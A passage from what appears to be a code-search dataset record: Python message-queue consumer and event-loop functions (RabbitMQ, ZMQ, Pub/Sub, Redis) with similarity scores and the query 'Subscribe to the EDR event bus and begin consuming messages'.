self.SubscriptionEvent.SEND_CHANGES:\n response = self.changes()\n log.debug(\"Sending changes\")\n yield from response\n elif event is None:\n log.warning(\"**** event is None ! ****\")\n # TODO error\n break\n else:\n log.warning(\"**** event=%s not processed ! 
****\", event)\n # TODO error\n break\n log.debug(\"Waiting for event\")\n event = self.read_queue.get()\n log.debug(\"Woke up event=%s\", event)\n if self.is_monitor_changes():\n self.stop_monitoring()\n\n log.info(\"<==\")", "async def pubsub_loop(self) -> None:\n logged_method = \"pubsub_loop\"\n self.logger.debug(logged_method, \"started\")\n\n while 1:\n have_message = await self.pubsub_channel.wait_message()\n if not have_message:\n break\n msg = await self.pubsub_channel.get(encoding=\"utf-8\", decoder=loads)\n self.logger.debug(logged_method, f\"got message {msg}\")\n\n if msg[\"cmd\"] == \"stop\":\n await self._pause_behaviors()\n\n elif msg[\"cmd\"] == \"start\":\n await self._resume_running_behaviors()\n\n elif msg[\"cmd\"] == \"shutdown\":\n self.shutdown_condition.initiate_shutdown()\n\n self.logger.debug(logged_method, \"waiting for another message\")\n\n self.logger.debug(logged_method, \"stopped\")", "def amqp_process_for_nfvi_kpi(self):\n if self.amqp_client is None and self.enable:\n self.amqp_client = multiprocessing.Process(\n name=\"AmqpClient-{}-{}\".format(self.mgmt['ip'], os.getpid()),\n target=self.run_collectd_amqp)\n self.amqp_client.start()", "def on_message_received(ch, method, properties, body):\n # the body contains the command flag followed by a colon ':' and the message for the drone\n # decode the body to utf8\n received_bytes = body.decode('utf-8')\n # split the received_bytes to get the command _flag and message\n recieved_message = received_bytes.split(':')\n # since rabbit mq body is a byte\n if (str(recieved_message[0]) == \"c01\"):\n # c01 - command center orders the drone to deliver a item\n print(\"Order Received from the command center to deliver an item to the following address \\n\", str(\n recieved_message[1]))\n time.sleep(2)\n # print in the drone's console that the item has been lift off\n print('\\nLifting off the Item to the delivery address.')\n print('\\nUpdating Status to the command centre ......')\n # Assume the drone has reached the delivery address . 
Now send a\n # message to the warehouse command center that it has reached the\n # delivery area\n time.sleep(5)\n rpc_sendback(\"c02\")\n # Assume the drone has delivered the item and issue the status message\n # to the command center\n time.sleep(5)\n rpc_sendback(\"c03\")\n # #Assume the drone has reached the parking spot and issue the message to the command center that is available for next instruction\n time.sleep(5)\n rpc_sendback(\"c04\")\n\n else:\n print(\"Received Instruction from Warehouse \" +\n str(recieved_message[1]))\n channel.basic_ack(delivery_tag=method.delivery_tag)\n # channel.start_consuming()", "def _listen_queue(self, queue, callback):\n # Listen buy/sell orders from external system\n self._logger.info(f\"Declaring rabbit queue {queue}\")\n self._consumer_rabbit_channel.queue_declare(queue=queue, durable=True, auto_delete=True)\n self._logger.info(f\"Declaring callback to rabbit queue: {queue}, callback: {callback}\")\n self._consumer_rabbit_channel.basic_consume(queue, callback,\n consumer_tag=queue)", "def start(self):\n\n # Start listening for records\n self._run_loop(True)\n # There might still be records in the queue.\n self._run_loop(False)", "def _listen_to_queues(cls):\n queues = cls.get_service_queues()\n for queue in queues:\n queue.consume(cls.process_messages)", "def test_dispatch_event(self):\n msg_helper = MessageHelper()\n worker_helper = WorkerHelper()\n broker = self.setup_broker(worker_helper)\n self.assertEqual(broker.get_messages('vumi', 'fooconn.event'), [])\n msg = msg_helper.make_ack()\n yield worker_helper.dispatch_event(msg, 'fooconn')\n self.assertEqual(broker.get_messages('vumi', 'fooconn.event'), [msg])", "def on_queue_declared(frame):\n start_consuming(frame)", "def __init__(self, bot_id, exchange, callback_func, rabbit_user, rabbit_pw, rabbit_host,\n rabbit_port, consumer_id = 0, internal_error_queue = None, statsd = None):\n\n super(RabbitConsumer, self).__init__()\n\n self.rabbit_port = rabbit_port\n self.rabbit_host = rabbit_host\n self.rabbit_pw = rabbit_pw\n self.rabbit_user = rabbit_user\n self.bot_id = bot_id\n self.exchange = exchange\n self.callback_func = callback_func\n self._closing = False\n self.stopped = False\n self._connection = None\n self._channel = None\n self._closing = False\n self._consumer_tag = None\n\n self.queue_name = self.exchange + \"-\" + self.bot_id\n self.error_queue_name = 'error-' + self.bot_id + \"-\" + self.exchange\n self.consumer_id = consumer_id\n self.internal_error_queue = internal_error_queue\n\n self.statsd = statsd\n\n self.statsd_prefix = self.exchange + \".\"\n\n self.invocations = 0\n self.total_execution_time = 0", "def handleIncoming(self):\r\n\t\trawQueue = list()\r\n\r\n\t\twhile True:\r\n\t\t\tif not self.activeConnection:\r\n\t\t\t\ttime.sleep(.1)\r\n\t\t\t\tcontinue\r\n\t\t\ttry:\r\n\t\t\t\trawQueue.append(self.serialPort.read(1).decode('ascii'))\r\n\t\t\texcept serial.serialutil.SerialException as e:\r\n\t\t\t\tcontinue\r\n\t\t\t# print(rawQueue[-1], int.from_bytes(rawQueue[-1], byteorder='big'))\r\n\t\t\t# if len(rawQueue) >= 1000:\r\n\t\t\t# \trawQueue.pop(0)\r\n\t\t\t# print(rawQueue)\r\n\t\t\tif rawQueue[0] != '$': # we pop items until the first one is a $ sign\r\n\t\t\t\t# print('popping the first character')\r\n\t\t\t\trawQueue.pop(0)\r\n\t\t\tif '\\n' in rawQueue: # we assume with the \\n we have a valid message\r\n\t\t\t\t# print('valid message')\r\n\t\t\t\trawQueue.pop(0) # remove the $\r\n\t\t\t\trawPayload = rawQueue[0:rawQueue.index(\"*\")]\r\n\t\t\t\tstringPayload = 
\"\".join(rawPayload)\r\n\t\t\t\tvalueList = stringPayload.split(\",\")\r\n\t\t\t\t# print(valueList)\r\n\t\t\t\tfor i in range(1, len(valueList)):\r\n\t\t\t\t\tvalueList[i] = int(valueList[i])\r\n\t\t\t\tvalueList[0] = messageTypes[valueList[0]]\r\n\r\n\t\t\t\tself.eventQueue.put(valueList)\r\n\t\t\t\trawQueue.clear()\r\n\t\t\t\t# print(valueList)\r\n\t\t\t\t# we are going to ignore checksums for now\r", "def run(self):\n self._no_tb = False\n self.traceback = None\n queues = (queue.attr, queue.clean) + queue.queues\n try:\n self.start.emit()\n while True:\n events = 0\n while len(self._events):\n events += 1\n if events == 50:\n self._queue(0)\n events = 0\n self.event_count += 1\n func, args, kwargs, tb_slot, tbs_time, tb_call, tbc_time = self._events.popleft()\n self._construct_tb((tb_slot, \"signal connection <%.4f>\" % (tbs_time - log.start_time)),\n (tb_call, \"signal emitter <%.4f>\" % (tbc_time - log.start_time)))\n func(*args, **kwargs)\n self._clear_tb()\n\n for q in queues:\n if len(q.active):\n break\n else:\n # Die if no events or outstanding processes\n break\n\n self._queue()\n\n finally:\n self.stop.emit()", "def process_incoming_rabbit_mq(self):\n self.groomer_state = \"3:PROCESS QUEUE\"\n lock_counter = 0\n while not self.incoming_queue_lock.acquire(False):\n self.my_local_logger.debug(\"Trying to acquire lock. Sleeping 0.05s.\")\n time.sleep(g_config.SLEEP_TIME)\n lock_counter += 1\n if lock_counter > 100:\n self.my_local_logger.debug(\"Cant acquire incoming queue lock, returning\")\n self.my_local_logger.error(\"Unable to acquire lock in process_incoming_queue, returning!\")\n self.groomer_state = \"4:PROCESS QUEUE LOCK ERROR\"\n return\n while not self.incoming_rabbit_mq.empty():\n self.my_local_logger.debug(\n \"Groomer says Incoming Rabbit MQ not empty, length is %d\" % self.incoming_rabbit_mq.qsize())\n self.my_local_logger.debug(\"Acquired lock\")\n # This is where the incoming grooming message is pulled off the Rabbit MQ.\n dequeued_item = self.incoming_rabbit_mq.get()\n if self.check_message_payload(dequeued_item):\n self.my_local_logger.info(\"A %s type message was dequeued \" %\n dequeued_item['messageType'])\n else:\n self.my_local_logger.error(\"Message payload is malformed in process_incoming_queue, returning\")\n if self.incoming_queue_lock:\n self.incoming_queue_lock.release()\n self.my_local_logger.debug(\"GROOMER rabbit MQ lock was released\")\n self.my_local_logger.info(\"The rabbit MQ lock was released\")\n self.groomer_state = \"5:PROCESS QUEUE MALFORMED\"\n return\n # Determine what is queue command type is and dispatch it.\n if dequeued_item['messageType'] == 'Test':\n # This is a dummy Test which is dropped for now.\n pass\n elif dequeued_item['messageType'] == 'Clear':\n # Restore the previous results\n pass\n elif dequeued_item['messageType'] == 'Save':\n # Save the current groom (filter) settings and kick off a new Utility wide groom process\n\n # Grab the Query message type and stuff it in a local fifo queue\n self.my_local_logger.debug(\"Save type message received\")\n self.my_local_logger.debug(\"query_guid = %s\" % \"None - missing on save\") # dequeued_item['queryGuid'])\n #######################################################\n # Collect interesting payload information here\n #######################################################\n if \"ttl\" not in dequeued_item.keys():\n dequeued_item[\"ttl\"] = g_config.TTL_UTILITY_SPAN\n self.local_q.append(dequeued_item)\n self.my_local_logger.debug(\"Message queued to the local incoming queue 
(len=%d)\" % len(self.local_q))\n self.my_local_logger.info(\"Message queued to the local incoming queue (len=%d)\" % len(self.local_q))\n pass\n elif dequeued_item['messageType'] == 'Query':\n # Grab the Query message type and stuff it in a local fifo queue\n self.my_local_logger.debug(\"Query type message received\")\n self.my_local_logger.debug(\"query_guid = %s\" % dequeued_item['queryGuid'])\n #######################################################\n # Collect interesting payload information here\n #######################################################\n if \"ttl\" not in dequeued_item.keys():\n dequeued_item[\"ttl\"] = g_config.TTL_MAX\n self.local_q.append(dequeued_item)\n self.my_local_logger.debug(\"Message queued to the local incoming queue (len=%d)\" % len(self.local_q))\n self.my_local_logger.info(\"Message queued to the local incoming queue (len=%d)\" % len(self.local_q))\n else:\n self.my_local_logger.error(\"incoming_rabbit_mq TYPE is a UNKNOWN\")\n if self.incoming_queue_lock:\n self.incoming_queue_lock.release()\n self.my_local_logger.debug(\"GROOMER rabbit MQ lock was released\")\n self.my_local_logger.info(\"The rabbit MQ lock was released\")\n self.my_local_logger.debug(\"process_incoming_rabbit_mq finished\")\n self.groomer_state = \"0:IDLE\"", "def prepare(self):\r\n self.socket.listen()\r\n for _ in xrange(self.threads):\r\n thread = Worker(self.tasks)\r\n thread.setDaemon(True)\r\n thread.start()\r\n self.prepared = True", "def subscribeConsumer(consumer):", "def run(self):\n self.listen(self.input_topics.filter_by(transmission='tcp'))\n\n logging.info('Getting into the listening loop')\n self.running = True\n while self.running:\n self.loop()", "def processEvents(self):\n if not self.getIsConnected():\n return\n\n # Loop until there is no more data in the receive buffer.\n while True:\n if not self._socketPoller.isReady():\n # There is no data waiting.\n return\n\n nBytesRead, _ = self._socket.recvfrom_into(self._buffer)\n if nBytesRead <= 0:\n # Since we checked for data ready, we don't expect this.\n return\n\n # _bufferView is a memoryview, so we can slice efficienty.\n self._elementReader.onReceivedData(self._bufferView[0:nBytesRead])", "def start_amqp(self):\n try:\n self.conn = amqp.Connection(self.amqp['host'], self.amqp['user'],\n self.amqp['password'],\n virtual_host=self.amqp['vhost'])\n self.channel = self.conn.channel()\n self.channel.exchange_declare(self.amqp['routing_key'], 'fanout')\n except socket.error:\n return False\n return True", "def event_queue_proc(self,event):\r\n event()", "def __init__(self):\n self.connection = pika.BlockingConnection(\n pika.ConnectionParameters(host='localhost'))\n self.channel = self.connection.channel()", "def start_task():\n get_results_from_message_queue()\n test_all_servers_connection()", "def main():\n configure_logging()\n\n # Attributes tell us what subscription has been created for us to listen to.\n project = get_metadata('instance/attributes/pubsub_subscription_project')\n service_account = get_metadata('instance/attributes/pubsub_service_account')\n subscription = get_metadata('instance/attributes/pubsub_subscription')\n pubsub = PubSub(service_account=service_account)\n\n while True:\n logging.info('Polling for new messages')\n ack_ids = []\n start_time = time.time()\n response = pubsub.pull(subscription, project)\n for message in response.get('receivedMessages', []):\n ack_ids.append(message['ackId'])\n attributes = message['message'].get('attributes', {})\n message = 
base64.b64decode(message['message'].get('data', ''))\n logging.info(\n 'Received message: %s\\nAttributes: %s',\n message,\n json.dumps(attributes, indent=2),\n )\n\n if message == 'CONNECT' and attributes.get('swarming_server'):\n if os.path.exists(SWARMING_UPSTART_CONFIG_DEST):\n os.remove(SWARMING_UPSTART_CONFIG_DEST)\n shutil.copy2(SWARMING_UPSTART_CONFIG_SRC, SWARMING_UPSTART_CONFIG_DEST)\n\n if not os.path.exists(SWARMING_BOT_DIR):\n os.mkdir(SWARMING_BOT_DIR)\n chrome_bot = pwd.getpwnam(CHROME_BOT)\n os.chown(SWARMING_BOT_DIR, chrome_bot.pw_uid, chrome_bot.pw_gid)\n\n if os.path.exists(SWARMING_BOT_ZIP):\n # Delete just the zip, not the whole directory so logs are kept.\n os.remove(SWARMING_BOT_ZIP)\n\n bot_code = urllib2.urlopen(urlparse.urljoin(\n attributes.get('swarming_server'), 'bot_code'))\n with open(SWARMING_BOT_ZIP, 'w') as fd:\n shutil.copyfileobj(bot_code, fd)\n os.chown(SWARMING_BOT_ZIP, chrome_bot.pw_uid, chrome_bot.pw_gid)\n\n pubsub.acknowledge(subscription, project, ack_ids)\n subprocess.check_call(['/sbin/shutdown', '-r', 'now'])\n elif message == 'LEASED' and attributes.get('lease_expiration_ts'):\n with open(LEASE_EXPIRATION_FILE, 'w') as f:\n f.write(attributes['lease_expiration_ts'])\n\n if ack_ids:\n pubsub.acknowledge(subscription, project, ack_ids)\n if time.time() - start_time < 1:\n # Iterate at most once per second (chosen arbitrarily).\n time.sleep(1)", "def run(self):\n init()\n list_name = comet_config.REDIS_NAMESPACE + \"incoming/\" + self.service_name\n list_name_processing = list_name + \"/processing\"\n self.redis = r\n while True:\n try:\n item = self.redis.brpoplpush(list_name, list_name_processing)\n self.process_incoming(item)\n self.redis.lrem(list_name_processing, item)\n\n except redis.ConnectionError:\n pass", "def setUp(self):\n # This Queue and Pipe let heartbeat send and receive messages to the\n # fake child client processes, and have those messages processed here.\n self.queue = Queue()\n self.consumer_master, self.consumer_slave = multiprocessing.Pipe()\n self.monitor_master, self.monitor_slave = multiprocessing.Pipe()\n\n # Only one consumer\n self.consumer = ProcessData(process=self.MockProcess(id=0,\n name='TestConsumer'),\n pipe=self.consumer_slave)\n\n self.monitor = ProcessData(process=self.MockProcess(id=0,\n name='TestMonitor'),\n pipe=self.monitor_slave)\n\n # Messages that StorageHeartbeat puts on the socket for the server\n # Are quickly decoded again and put on this queue for verification\n self.socket_queue = Queue()\n\n # We use MockSocket to impersonate a real socket\n self.socket = self.MockSocket(self.socket_queue, self)\n\n self.dut = StorageHeartbeat(consumers=[self.consumer],\n monitor=self.monitor,\n report_in=self.queue,\n runtime=10,\n poll_period=5,\n client_socket=self.socket)", "def run(self) -> None:\n\n while not self.stop_event.is_set():\n if self.my_queue:\n # if heartbeat received at '/heartbeat' route from the monitored peer,\n # sleep until next\n self.my_queue.clear()\n time.sleep(7)\n\n else:\n # else drop peer data from database and inform central server appending '0'\n # to my queue\n self.db_access.drop_peer(self.peer_id)\n self.my_queue.append(0)\n break", "def on_queue_declared(self, frame):\n\t\tself.channel.basic_qos(prefetch_count=1)\n\t\tself.channel.add_on_cancel_callback(self.on_consumer_cancelled)\n\t\tself.consumer_tag = self.channel.basic_consume(\n\t\t\tself.handle_delivery, \n\t\t\tframe.method.queue\n\t\t)", "def configure_rabbit (ec2_conn,base_name,params ):\n print \"configuring 
rabbitmq exchanges and Queues\"\n app_type = 'RABBITMQ'\n \n logging.basicConfig()\n \n ## Allow security from build server to rabbitmq\n rabbit_lb_sec_grp_name = get_lb_secgrp_name( base_name, app_type )\n rabbit_lb_sec_grp = find_secgrp(ec2_conn, rabbit_lb_sec_grp_name)\n \n try :\n rabbit_lb_sec_grp.authorize( ip_protocol = \"tcp\",\n from_port = 8443,\n to_port = 8443,\n cidr_ip = build_server_cidr )\n except :\n print \"rule exists aready\" \n \n \n rabbitmq_host = params.get( 'host' )\n rabbitmq_port = params.get( 'port' )\n rabbitmq_username = params.get( 'user-name' )\n rabbitmq_password = params.get( 'password' )\n exchanges = params.get( 'exchanges' )\n \n amqp_url='amqp://'+rabbitmq_username+':'+rabbitmq_password+'@'+rabbitmq_host+':'+rabbitmq_port+'/%2f'\n amqp_url = str(amqp_url)\n parameters = pika.URLParameters(amqp_url)\n connection = pika.BlockingConnection(parameters)\n channel = connection.channel()\n \n \n \n for exchnage in exchanges :\n exchange_name = exchnage.get(\"name\")\n exchange_type = exchnage.get(\"type\")\n queue_name = exchnage.get(\"queue\")\n routings = exchnage.get(\"bindings\")\n channel.exchange_declare(exchange=exchange_name,\n exchange_type=exchange_type,\n durable=True )\n channel.queue_declare(queue=queue_name,\n durable=True)\n for routing in routings :\n channel.queue_bind(queue=queue_name, exchange=exchange_name, routing_key=routing)\n print \"binging exchnage: \" +exchange_name+\", to a queue:\"+queue_name+\" ,with routing key:\"+routing\n \n ## close connection at the end \n connection.close()\n \n ## At the end revoke the build server rule \n try :\n rabbit_lb_sec_grp.revoke( ip_protocol = \"tcp\",\n from_port = 8443,\n to_port = 8443,\n cidr_ip = build_server_cidr)\n \n except :\n print \"exception removing rule\"", "def run():\n listen_active_email_channel()", "def subscribe(receiver, catchup):", "def __init__(self, config):\n self.config = config\n self.received_messages = []\n self.processed_messages = []\n\n self.setup()", "def processIncoming(self):\n while self.queue.qsize():\n try:\n # print 'queue'\n msg = self.queue.get(0)\n # Check contents of message and do what it says\n # As a test, we simply print it\n if msg == \"exit\":\n self.deviceError()\n if msg == \"error\":\n self.deviceError()\n else:\n self.decode(msg)\n except Queue.Empty:\n pass", "def listener():\n try:\n conn = connect_to_db()\n\n LOGGER.info(\"Reading queued Sawtooth transactions\")\n while True:\n feed = r.table(\"inbound_queue\").order_by(index=r.asc(\"timestamp\")).run(conn)\n count = 0\n for rec in feed:\n LOGGER.debug(\"Processing inbound_queue record\")\n LOGGER.debug(rec)\n process(rec, conn)\n count = count + 1\n if count == 0:\n break\n LOGGER.info(\"Processed %s records in the inbound queue\", count)\n LOGGER.info(\"Listening for incoming Sawtooth transactions\")\n feed = r.table(\"inbound_queue\").changes().run(conn)\n for rec in feed:\n if rec[\"new_val\"] and not rec[\"old_val\"]: # only insertions\n LOGGER.debug(\"Processing inbound_queue record\")\n LOGGER.debug(rec[\"new_val\"])\n process(rec[\"new_val\"], conn)\n\n except Exception as err: # pylint: disable=broad-except\n LOGGER.exception(\"Inbound listener %s exception\", type(err).__name__)\n LOGGER.exception(err)\n\n finally:\n try:\n conn.close()\n except UnboundLocalError:\n pass", "def queue_processor(self):\n\n while self.state != consts.SMPP_CLIENT_STATE_CLOSED:\n try:\n p = self.queue.get(timeout=1)\n self._request_handler(p)\n self.queue.task_done()\n except Empty:\n pass", "def 
consume_messages(self):\n\n method_frame, properties, body = self.channel.basic_get(self.queue_name, no_ack=False)\n\n while method_frame:\n\n LOGGER.info(\"Message received\")\n\n self.channel.basic_ack(method_frame.delivery_tag)\n payload = json.loads(body)\n if not isinstance(payload, dict):\n return\n\n # Process the message\n if 'control' in payload:\n LOGGER.info(\"A control signal received!\")\n # self.set_control(payload['control'])\n print(payload['control'])\n\n # Continue getting messages\n method_frame, properties, body = self.channel.basic_get(self.queue_name, no_ack=False)\n\n # TODO\n # return control_signal", "async def declare_and_consume(self, handler):\n try:\n await self.declare()\n self.consume(handler)\n except pika.exceptions.ChannelClosed: # pragma: no cover\n self.reconnect()", "def listen(self):\n self.channel.start_consuming()", "def loop(self):\n _logger.info(\"Bus.loop listen imbus on db postgres\")\n # PATCH !!\n with odoo.sql_db.db_connect(_get_imbus_db()).cursor() as cr:\n conn = cr._cnx\n cr.execute(\"listen imbus\")\n cr.commit();\n while True:\n if select.select([conn], [], [], TIMEOUT) == ([], [], []):\n pass\n else:\n conn.poll()\n channels = []\n while conn.notifies:\n channels.extend(json.loads(conn.notifies.pop().payload))\n # dispatch to local threads/greenlets\n events = set()\n for channel in channels:\n events.update(self.channels.pop(hashable(channel), []))\n for event in events:\n event.set()", "def _run(self):\n print \"ZMQSubscriber: loop started\"\n port = \"5556\"\n context = zmq.Context()\n socket = context.socket(zmq.SUB)\n socket.connect(\"tcp://localhost:%s\" % port)\n # socket.setsockopt_string(zmq.SUBSCRIBE, u'') # get everything\n socket.setsockopt_string(zmq.SUBSCRIBE, u'[firewall]')\n socket.setsockopt_string(zmq.SUBSCRIBE, u'END')\n\n while self._do_work.is_set():\n try:\n data = socket.recv_string()\n # print \"Got data:\", repr(data)\n print data\n if data == 'END':\n self.stop()\n except Queue.Empty:\n pass\n\n print \"ZMQSubscriber: loop stopped\"", "def run(self):\n\n # waits for new messages and reacts based on message\n try:\n self.__email_handler.run()\n except KeyboardInterrupt:\n print('\\nClosing...\\n')\n except Exception as e:\n print(f'{self.__source}: and error has occured: %s' % e)", "def run(config, logging, inq, subscribe_callback, unsubscribe_callback):", "def process(self):\n\n self.wsRms.connect()\n\n self.scheduler = Scheduler(self)\n self.scheduler.setDaemon(True)\n self.scheduler.start()\n\n while not self.stop:\n json = self.wsEngine.receive()\n if json == None:\n time.sleep(1)\n continue\n print \"------->Receive from lib: %s\" %json\n message = Message().restore(json)\n\n if message.getCmd() == Message.CMD_REGISTER:\n self.waitingQueue.append(message)\n\n elif message.getCmd() == Message.CMD_RELEASE:\n self.wsRms.release(message.getRes())\n self.runningQueue.remove(message)\n\n self.scheduler.stop()", "def test_process_subscriptions(self):\n pass", "async def do_run(self, event_bus: EndpointAPI) -> None:\n ...", "def collect(self):\n while True:\n if not self._queue.empty():\n message = self._queue.get()\n self.working_on = message['job_type']\n else:\n break\n logging.info(\"Popped off message: {}\\n\".format(str(message)))\n\n if message['job_type'] == 'STOP':\n break\n\n if message['job_type'] != 'MAINTAIN' and message['job_type'] != 'UPDATE':\n raise ValueError('{} is not a recognized task type'.format(message['job_type']))\n pass\n\n # Query all repos with repo url of given task\n repoUrlSQL = 
s.sql.text(\"\"\"\n SELECT min(repo_id) as repo_id FROM repo WHERE repo_git = '{}'\n \"\"\".format(message['given']['github_url']))\n repo_id = int(pd.read_sql(repoUrlSQL, self.db, params={}).iloc[0]['repo_id'])\n\n try:\n if message['models'][0] == 'pull_requests':\n self.pull_requests_model(message, repo_id)\n elif message['models'][0] == 'pull_request_commits':\n self.pull_request_commits_model(message, repo_id)\n elif message['models'][0] == 'pull_request_files':\n self.pull_requests_graphql(message, repo_id)\n except Exception as e:\n register_task_failure(self, message, repo_id, e)\n pass", "def subscribe(self):\n with self._rabbit_connection.connection.channel() as channel:\n self._queue = rabbitpy.Queue(\n channel=channel,\n name=self._subscriber_name + \"_queue\",\n durable=True,\n message_ttl=5 * 24 * 60 * 60 * 1000 # 5 days\n )\n self._queue.declare()\n self._queue.bind(self._exchange, self._routing_key)\n\n self._consume()", "def starting(self):\n ident = self.ident()\n print('{} starting & consuming \"{}\".'.format(ident, self.to_consume))\n\n if self.max_tasks:\n print('{} will die after {} tasks.'.format(ident, self.max_tasks))\n else:\n print('{} will never die.'.format(ident))", "def doRead(self):\n if self.read_scheduled is not None:\n if not self.read_scheduled.called:\n self.read_scheduled.cancel()\n self.read_scheduled = None\n\n while True:\n if self.factory is None: # disconnected\n return\n\n events = self.socket_get(constants.EVENTS)\n\n if (events & constants.POLLIN) != constants.POLLIN:\n return\n\n try:\n message = self._readMultipart()\n except error.ZMQError as e:\n if e.errno == constants.EAGAIN:\n continue\n\n raise e\n\n log.callWithLogger(self, self.messageReceived, message)" ]
[ "0.7568344", "0.67390686", "0.6702978", "0.6613848", "0.65698355", "0.6562793", "0.65285885", "0.6489923", "0.6489923", "0.6489923", "0.64743716", "0.64450294", "0.63913554", "0.63741064", "0.62963545", "0.62910515", "0.6283345", "0.62690264", "0.6255861", "0.62298816", "0.6216329", "0.6198216", "0.61951655", "0.6176048", "0.6142124", "0.60997856", "0.6060243", "0.60539275", "0.60395885", "0.6017347", "0.601186", "0.60020995", "0.59957606", "0.5978966", "0.597641", "0.5958713", "0.5936582", "0.59230113", "0.59093016", "0.5906723", "0.58999825", "0.58811253", "0.5861857", "0.58432186", "0.58409595", "0.5823901", "0.58067787", "0.5802711", "0.58018523", "0.57569915", "0.57493454", "0.5742275", "0.57340074", "0.5718761", "0.5713176", "0.5709526", "0.5709069", "0.5658083", "0.56498927", "0.56435245", "0.5641897", "0.56383777", "0.56190044", "0.5583194", "0.5569084", "0.5563686", "0.5554278", "0.5542721", "0.553846", "0.5528842", "0.55273986", "0.55229574", "0.55198646", "0.5516872", "0.55136454", "0.55094266", "0.55087054", "0.55078924", "0.5505693", "0.5503922", "0.54990774", "0.5497655", "0.54975855", "0.5490809", "0.5486275", "0.5481875", "0.5475564", "0.54752964", "0.54737043", "0.5468555", "0.54681677", "0.54669315", "0.5451732", "0.5446248", "0.54456586", "0.54408604", "0.5436992", "0.543204", "0.5429696", "0.54296094" ]
0.62451327
19
Close any open resources
def on_stopping(self): self.logger.info("Got a shutdown of service") try: if self.connection is not None: self.connection.close() self.connection = None if self.processor_pool is not None: self.processor_pool.close() self.processor_pool.join() self.debug = self.forwarder_options.get("debug", "0") != "0" if self.debug: self.logger.setLevel(logging.DEBUG) except: self.logger.exception("Error stopping service")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def close():", "def finalize(self):\n self.ratings.close()\n self.users.close()\n self.movies.close()", "def close(self):\n for lrms in self.resources.itervalues():\n lrms.close()", "def do_close(self):\n self.cleanup(True)\n self.close()", "def close( self ):\n self.__del__()", "def close (self):\n pass\n #TODO: implement more realistic closing semantics", "def close(self):\r\n self._report_file.close()\r\n # Make sure everything's closed.\r\n for files in self._output_files.values():\r\n for f in files.values():\r\n f.close()", "def cleanup(self):\n self.io.close()", "def close (self):\n pass", "def __del__(self):\n self.close_files()", "def _CloseOutputFiles(self):\n self.gfile.close()\n self.efile.close()", "def close(self):\n pass", "def close(self):\n pass", "def close(self):\n pass", "def close(self):\n pass", "def close(self):\n pass", "def close(self):\n pass", "def close(self):\n pass", "def close(self):\n pass", "def close(self):\n pass", "def close(self):\n pass", "def close(self):\n pass", "def close(self):\n pass", "def close(self):\n pass", "def close(self):\n pass", "def close(self):\n pass", "def close(self):\n pass", "def close(self):\n pass", "def close(self):\n pass", "def close(self):\n pass", "def close(self):\n pass", "def close(self):\n pass", "def close(self):\n pass", "def close(self):\n pass", "def close(self):\n pass", "def close(self):\n pass", "def close(self):\n pass", "def close(self):\n pass", "def close(self):\n pass", "def close(self) -> None:\n ...", "def close(self) -> None:\n ...", "def close(self) -> None:", "def close(self) -> None:", "def close(self) -> None:", "def close(self) -> None:", "def close(self) -> None:", "def close(self) -> None:", "def close(self) -> None:", "def close(self) -> None:", "def close(self):\r\n pass", "def close(self):\r\n pass", "def close(self):\r\n pass", "def _close(self):\n for fd in self._fds:\n try:\n os.close(fd)\n except:\n pass", "def close(self):\n ...", "def close(self):\n ...", "def close(self):\n pass", "def close(self):\n pass", "def close(self):", "def close(self):", "def close(self):", "def close(self):", "def close(self):", "def close(self):", "def close(self):", "def close(self):", "def close(self):", "def close(self):", "def __del__(self):\n for handle in self._filehandles:\n handle.close()", "def __del__(self):\n self.close()", "def __del__(self):\n self.close()", "def __del__(self):\n self.close()", "def __del__(self):\n self.close()", "def __del__(self):\n self.close()", "def __del__(self):\n self.close()", "def __del__(self):\n self.close()", "def __del__(self):\n self.close()", "def __del__(self):\n try:\n self.close()\n except:\n pass", "def Close(self):", "def close():\n sys.exit()", "def close(self) -> None:\r\n pass", "def _close(self):\n self.fh.close()", "def __del__(self):\n if self._close_on_exit:\n self.close()", "def __del__(self):\n\n if self._is_open:\n self.close()", "def close(self):\n self._close()", "def close(self):\n self._close()", "def close(self):\n self.fileobj.close()", "def close(self):\n self.fileobj.close()", "def close(self) -> None:\n pass", "def close(self) -> None:\n pass", "def close(self) -> None:\n pass", "def close(self):\r\n pass", "def __exit__(self, exc_type, exc_val, exc_tb) -> None:\n for obj in self.__dict__.values():\n if hasattr(obj, 'close'):\n obj.close()", "def __del__(self) -> None:\n self.close()", "def _close( self ):\n for sji in self._sji_data:\n sji.close()", "def close(self):\n self._stream.close()\n self._arch.close()", "def close(self):\n 
self.closed = True\n for stream in self.streams:\n stream.close()", "def close(cls):\n pass", "def close_files(self):\n self.wb_alm.close()\n self.wb_defect.close()\n self.wb_enhancement.close()\n self.wb_incident.close()\n self.wb_destination.close()", "def close(self):\n return", "def close(self):\n return", "def close(self):\n return" ]
[ "0.8018784", "0.78392184", "0.77499765", "0.7615301", "0.7552293", "0.75487936", "0.7532097", "0.75203544", "0.7515063", "0.7499064", "0.7497777", "0.7487781", "0.7487781", "0.7487781", "0.7487781", "0.7487781", "0.7487781", "0.7487781", "0.7487781", "0.7487781", "0.7487781", "0.7487781", "0.7487781", "0.7487781", "0.7487781", "0.7487781", "0.7487781", "0.7487781", "0.7487781", "0.7487781", "0.7487781", "0.7487781", "0.7487781", "0.7487781", "0.7487781", "0.7487781", "0.7487781", "0.7487781", "0.7487781", "0.74826914", "0.74826914", "0.74812084", "0.74812084", "0.74812084", "0.74812084", "0.74812084", "0.74812084", "0.74812084", "0.74812084", "0.7454858", "0.7454858", "0.7454858", "0.7448511", "0.7437798", "0.7437798", "0.7435965", "0.7435965", "0.7412172", "0.7412172", "0.7412172", "0.7412172", "0.7412172", "0.7412172", "0.7412172", "0.7412172", "0.7412172", "0.7412172", "0.7406675", "0.739233", "0.739233", "0.739233", "0.739233", "0.739233", "0.739233", "0.739233", "0.739233", "0.73736715", "0.7348615", "0.73434204", "0.7326901", "0.7319398", "0.73192334", "0.7309946", "0.7302832", "0.7302832", "0.72972506", "0.72972506", "0.7292621", "0.7292621", "0.7292621", "0.72878593", "0.72833186", "0.7273759", "0.7250635", "0.72452486", "0.72426236", "0.72410935", "0.72212607", "0.7199162", "0.7199162", "0.7199162" ]
0.0
-1
Subscribe to the EDR event bus and begin consuming messages
